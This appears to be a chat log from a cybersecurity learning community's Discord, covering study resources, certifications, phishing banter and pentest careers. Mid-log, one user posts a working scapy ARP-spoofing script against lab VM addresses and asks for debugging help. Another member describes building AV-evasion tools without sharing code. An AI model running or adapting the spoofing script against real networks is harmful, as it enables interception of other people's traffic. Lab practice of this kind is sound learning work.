Hey everyone, I'm new here. I'm looking for fellow students (both Italian and international) to chat about cyber security topics, discuss projects, or just exchange a few words about career paths. I've been studying every day for the past 6 months, and I'd love to connect with others who are still students like me. Hope I posted this in the right spot—if not, sorry about that!

Hello guys, I'm doing telnet but it seems the Get command is not working also what should be the Host? Any guidance pls🥹

Can you provide a screenshot 🙂 ?

If you're looking for a career advice , try to ask guys in #cyber-and-careers channel 🙂

Can anyone recommend a good site for learning python that's free?

penjee

freeCodeCamp on YT

Thanks I'll check them out

Yea

You will have to verify to upload images 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Ohkayy thanks

Gave +1 Rep to @weary meteor (current: #1 - 4317)

What about kaggle.com ? It's mostly about Machine Learning, but there's a python course there. There's also W3Schools.

Thanks for the recommendation I'll look it up

Gave +1 Rep to @coarse river (current: #1824 - 2)

CodeCademy also - THM equivalent in coding space altough it is only partly free like THM 🙂

ChatGPT to clarify questions alongside a youtube tutorial can do wonders also btw

Which rooms will help get ready for the cysa+ exam? Any ideas?

Check out SOC 1 and 2 paths

Yeah, I see that now. Thank you. I have CompTIA Security+ and working on Cysa so this is perfect.

Gave +1 Rep to @weary meteor (current: #1 - 4323)

Yes but they don't have that many free lessons

I can recommend udemy.
They have a lot of python courses for all levels.
Sometimes You can get them as offer for 15-20$

Now you even have top 10k rated courses on udemy for like 15$/month 🙂

It is called Udemy plus i think

per month subscription - you have to pay a certain amount per month and you can join selected courses for free. Or you buy the course on offer and can use it for lifetime

You pay 15$/month and you have access to top 10.000 rated courses on Udemy for as long as you pay the sub . Something like Netflix 🙂

Have you tried python courses on udemy? What is your experience with it? It seems ok, I might do a free trial to try it out

My experience with it so far has been very good. I have already completed several courses. Python AI, machine learning, trading bots, etc.
Each course has trial lessons that you can watch and 30 days money back

Sound good, I'll try it out. Thanks for the recommendation.

Gave +1 Rep to @boreal maple (current: #2787 - 1)

👍

thats so sarcastic xD

Why 🙂 ?

for me at least :p udemy isn't comparable with Netflix 😂

I was talking about pricing 🙂

i know :)

https://l1nq.com/exploit-vault-xss-rfi

whats this

Nevermind, nothing serious

Hi

What is this?

Simply a joke, but apparently no one is falling for it.
I've concealed the YouTube link behind a simple URL shortener.
Date + YouTube = ?

Maybe nobody wants to click it because you know ..

Phishing

Maybe because I believe this community is smarter than that and not falling for phishing, knowing how to manage a link.

When it loads for 20 seconds, get out

I mean, I've managed it successfully in here before 🤷‍♂️
Anyone can fall for SE.

On numerous occasions, I might add

Well, I figured that it wasn't so difficult to open it in a v-box, maybe with a live even.
I mean... It's something that we all use here.
When I've received it, it was my first approach to copy the link and open it that way 😅

Troy Hunt literally admitted that he got phished very recently. No one is immune. Less likely? Sure, immune, though? 😄

I mean, if someone you trust got compromised, its likely

I'd trust a link from one of my family members, for example 🤷‍♂️

Ok then, maybe you'll like this more.
Funny, even if not "today" related

commit strip is great

You know how you can be immune no talking to anyone no technology boom phishing solved

What about sending letters?

No communication of any kind you beat phishing

I mean, you got a fair point, that's one way to solve phishing

Getting phished in a hand written letter is talent 😂

The Nigerian prince scams but in actual physical mailboxes

omg THM sponsored Fireship!

really?

yha last video

i’ll check it out

hey i'm a nigerian prince what's up

quiet

Hello, I'm new here. I'm looking for study buddy or study groups for TryHackMe or HacktheBox(pentesting)? Thanks

hi

🤣

hey im in the same situation btw so if you find some, would you prevent me ?

hey I'm in the same situation here buddy can you help me if you find some...

Hey guys. I'm new here. I'm seeking a study buddy or study groups for TryHackMe or HacktheBox(pentesting).

Feel free to reach out in #room-help 🙂

CAN SOMEBODY HELP ME IN MY ERROR
I AM USING PYTHON IN KALI LINUX VM
here is my code "#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_packet = broadcast / arp_request
answered_list = scapy.srp(arp_packet, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)

no_packets_sent = 0

try:
while True:
spoof("192.168.126.135", "192.168.126.2")
spoof("192.168.126.2", "192.168.126.135")
no_packets_sent += 2
print("\r[+] Packet Sent: " + str(no_packets_sent)),
sys.stdout.flush()
time.sleep(2)
except KeyboardInterrupt:
print("\n[+] Detected CTRL+C... Quitting..")" and its working fine until i search anything on internet in victim vm "root@kali:~/PycharmProjects/All/Arp spoofing# python arps.py
[+] Packet Sent: 12
Traceback (most recent call last):
File "arps.py", line 23, in <module>
spoof("192.168.126.135", "192.168.126.2")
File "arps.py", line 15, in spoof
target_mac = get_mac(target_ip)
File "arps.py", line 12, in get_mac
return answered_list[0][1].hwsrc
File "/usr/local/lib/python2.7/dist-packages/scapy/plist.py", line 176, in getitem
return self.res.getitem(item)
IndexError: list index out of range
root@kali:~/PycharmProjects/All/Arp spoofing# "PLZ

try to ask in #programming channel 🙂

#programming @empty jasper add error handling in your code

Looking for a learning partner pls dm mee if anyone interested

Transitioning from software dev to cyber security... currently doing the Cyber Security 101 path on TryHackMe and some CTFs here and there. Any tips or suggestions?

take notes on paper or on your computer
get a rubber ducky to talk through your problems with to increase your solving said problems
teach the rubber ducky things you have learnt today.. both is by talking loudly to it

Hlo
I am trying to subscribe on tryhackme but it is showing card declined. Can anyone help??

Have you checked your bank?

If the bank says there is no issue on their end, you can drop an email to THM Support so they can check the issue on their side.

Yes I tried with different banks from my friend's banks too. But same issue

Actually I asked them to remove my payment details from showing directly in my account subscription section. And now this is happening

Good day guy, please has anyone tried the Ec-council CCT certification, need some exam and practical tips, thanks in advance

hey their was a glitch where you could bypass the filters with a lot of mispelling. idk if they patched it though

Suggest you post this in #cyber-and-careers, but I wouldn't expect positive feedback unless you are based in India.

We can't help you with that 🙂

I saw rubber ducky and i thought you meant the USB Rubber Ducky haha, was well confused as to why would you talk to that but I get what you mean now

Good advice though, still.

It was a scam 🙂

https://tenor.com/view/james-veitch-we-need-to-talk-about-the-ducks-the-bathroom-ducks-duck-gif-24937794

james viche or however his name is spelled has some fun for sure

The time mentioned in the first point (11:00 PM to 3:00 AM) is in UTC (Coordinated Universal Time) ?

Suggest to post this query in #site-support

i found your issues and sent you a DM

Seniors... I need your HELP I am completely new to linux and all.. In my Kali linux VM sometimes i get the message "windows application error the instruction at referenced memory at the memory could not be read click on OK to terminate the program" and the vm get terminated.. today i tired to change the background and this happened.. i tried to open settings and this happened.. can u tell me whts going on?🥲

i dont know about it

How much storage and RAM does your host machine has? What hypervisor (e.g., VMware Workstation, Oracle VirtualBox, etc.?

should i study SQL, PHP, HTML, CSS, JavaScript, Python, C#, C++, Java

Well you should be familiar with some of those concepts for cyber security 🙂

You don't need to know them immediately if you're a beginner . You will get along with those concepts over time 🙂

most of this stuff is fairly easy, like you can learn the basics of HTML, CSS and javacript in a week or two, I'm not saying be an expert but know it well enough that when you read code you can guess what it does (and be 90% correct)

You won't understand anything to SQL Injection if you don't know SQL first.
You won't understand anything to identifying vulnerable code if you don't understand PHP & Java.
You won't understand how a webshell works without first understanding PHP.
You won't understand web hacking and template injection without HTML.
You won't understand XSS or DOM Hacking if you don't know JavaScript.
You won't be able to develop your own scripts and will remain a script kiddy if you don't know how to dev in Python, Java or C.

CyberSecurity and specially offensive security, is NOT entry level job or learning path. Please learn computer basics first.
People do help desk jobs before pivoting into cybersec. People are first web developers before pivoting into cybersec. People are first DB / System admins before pivoting into cyber.

The common problem I see nowadays is that people expect to hop on platforms like TryHackMe and immediately become hackers. Wrong. It takes years. Any hacker that don't know how to develop their own tools is referred to as a script kiddy - which means a person who only rely on simply copy pasting commands from pre-developed tools.

You need to learn basic dev at least. As you can see above, some people get directly into hacking without even knowing what "Computer Specifications" are, such as RAM etc. A basic gamer would know. So it's even less than the minimum for a hacker.

The picture above shows it well. Anyway, THM has everything detailed step by step, from pre-sec to cybersec 101. Check it out before considering hacking. Very little are the people who directly lands their first job ever as CyberSecurity Analysts, Pentesters etc...

https://tryhackme.com/hacktivities

Which paths or courses are best to break out of script kiddy phase? I mean I follow the paths on tryhackme but I feel like I'm not learning anything. maybe its just me

THM will teach you how to pentest (When it comes to offensive security), but it won't teach you programming - which is totally normal since it's not part of the platform to teach you programming...
You just need to learn a certain language and program in it.
In a typical pentest, you'll mostly use already developped tools. However, in multiple THM rooms, you'll come across challenges where coding is needed. Adapting tool code is also needed. This is where you'll need to code on THM.

In real life, you'll also need it quite a lot.

I guess I'll need to learn python or something.... thanks

Gave +1 Rep to @strange plank (current: #590 - 10)

You will, as DKob mentioned.

If you're completely new to programming, I'd recommend spending some time learning a language like C++ or Java in-depth.

You'll be required to do static code analysis at a lot of points, and you'll need to know how to read and understand what the code is doing, even if you aren't proficient in the language. Languages like PHP and Rust aren't going to be as easily readable and user-friendly as Python is, which is why I recommended learning a relatively lower level language like C++ or Java first.

I would strongly argue that it does not actually teach pentest - it teaches the technical side, mostly, but the business side is hardly touched from what I remember of the hactivities. Scoping, rules of engagement and the reporting are as important as the technical side.

When you say pentest in a CTF discord server, 99% of people will automatically assume the technical side. No one thinks of the business side on CTF platforms unless it's a paid certification.

That's true, but it's setting the expectation for what industry actually does and wants - IMO it's better to get the dream crushing out of the way early so someone doesn't dedicate tons of time learning a professional skill for a role they actually aren't interested in.

Pretty sure the technical side is most of the hard work
Reporting is just a skill that isn't very hard to learn compared to the technical expertise required to pentest

If reporting and limited scope of engagement is what stops someone from pentesting after all the hard work on certifications and CTFs, then IDK what to say

It's not hard to learn, but it's one of those administrative things almost everyone hates to do. Most of the training I give our internal pentesters is on reporting and the admin side - they are fine technically, but communicating findings and making remediation recommendations requires a lot more of the business context

My report writing and such can do with a bit of work.

Still, my point above stands

This one ^ in particular

I don't disagree. My point is that the admin is overlooked because it seems like every aspiring pentester thinks it's just sexy breakign things time

I don't think I've seen anyone enjoying doing reports, it's a take or leave situation

Yep.

Yes, that's fair

A couple of younger people (late teens/early 20s) wanted to be pentesters until I walked them through the entire process. They just wanted to break things and somehow had the idea that the value in a pentest was 100% in the breaking..... but it's the reporting that gives the business value.

I'm the early 20s

The report is the primary deliverable for the engagement, if that sucks, you've just wasted everyone's time.

It sounds like you are in industry alraedy, and understand the surrounding context. The young people I'm talking about were considering a career transition with zero IT background and knowledge.

Yeah, my first job ever was directly in CyberSec

That's pretty rare, congrats

Grinded for over 12 hours per day for like a year

Thanks!

Gave +1 Rep to @spark sun (current: #11 - 832)

My first IT job was also in cybersec; but I came into it with a B.Sc in CompSci and 3/4 of a M.Sc in comp sci.

Same situation here
Did a BSc in Comp Science
A MSc in CyberSec

Around 5 certs, which 2 are in pentest
I had to pull out the big game to get a job

Europe market is pretty bad when it comes to offsec

I got hired to build a compliance tool, ended up being a principle infosec engineer doing pentest, vuln management, some sec architecture, and compliance for 14 frameworks

That sounds very cool

passed the CISSP within 6 months of initial hire

Is the CISSP worth it?

but didn't have the time served for it

It's the piece that connects technical to business

If work pays for it, get it

My employer would never lol

Guys, what certificate would u recommend me to pass as an offsec pentest enthusiast? I already have basic cybersec certificate aimed at pentest field

It highly depends... what's your level?

If you're still a beginner, maybe train a bit on platforms first before paying for certifications

You should never pay a certification out of pocket, unless it's actually required for your next role. Certs are how the business demonstrates competency, they don't do much for you personally

Mybe beginner level... just started doing easy levels ctfs

Learn network or system administration

You'll learn more about how to break systems by learning how to secure them

I've got knowledge in python, js, html, css, sql and I'm considering to learn other languages

Unfortunately. I paid all my certs out of pocket. Currently full time in IAM, part time red team exercises. I'm trying to pivot to full time red, but it's hard in europe with the non existent offsec market.
It's why I took the decision to pass my CRTO and then stop here until I find a job that pays for my certs.

sys admin for linux or both

if your employer requires industry-wide certification (like ISO 27001, 27002) you can make the case that it's actually required for audit.... because one of the admin requirements in 27k1 is that the business is staffed by appropriate expertise. And just having the role doesn't demonstrate that, the individual contributor certifications do.

In the IAM department it's more oriented to certifications such as CyberArk ones, Okta, and microsoft's Entra certs (SC-300)

Basically nothing that really gets my attention

That's the only certs my employer is willing to pay for

You're currently jr or associate role, then? Your employer should also be preparing you to move up as well. If they are pigeon-holing you into your current role and you've been there a year, start looking to make a move up in another company

Jr position - I joined the company at 22 Y/O after my MSc. Ive been there for a year and 3 months

And since I was deep into OffSec, they offered me a part time in the OffSec department

You have a M.Sc in cybersec, they should be looking to promote you very soon. If they aren't, it's my opinion that you have likely outgrown your current role already and need to think about what the next step you want to take is

The next step I want to take is RTO. I'm already into maldev and evasion + already developed tools capable of evading AVs with full protection

Currently working on EDRs with changing callback functions to the kernel

Good. Does your work have a path for you to join RTO full time?

lol I wish. There is a path for pentester full time. RTO is non-existent in France, unless it's an insurance company or you work in the government.

I'm also dual national, so government is a bit hard without giving up my other nationality.

Yeah, that's fair

One more thing is that, my profile is a bit weird and rare, so not everyone is willing to take me.

For context, I started offsec a year and a half ago only. So 2 years ago, I didn't even know what SUID was.

RTO after just only 1.5 year... eh... not everyone wants that

Fair

Yup.

Do you have any resources to learn more about the business side of it?

Because I've been lacking in that area

Technical knowledge is fine for me, and I'm okay with the basics of how a penetration test works (ROE, reports, communication) but there's obviously a lot more to it, like GRC etc

So every business a little different, and what each business wants out of a pentest is going to be slightly different. I actually think Pentest+ is a good content for the business side of a pentest. Working into a vulnerability management role is good, because you'll see how remediation works and that is valuable insight for pentest report writing and remediation recommendations.

MAN!!!! I just discoverd the live kali version, compared to virtual machinces it looks like heaven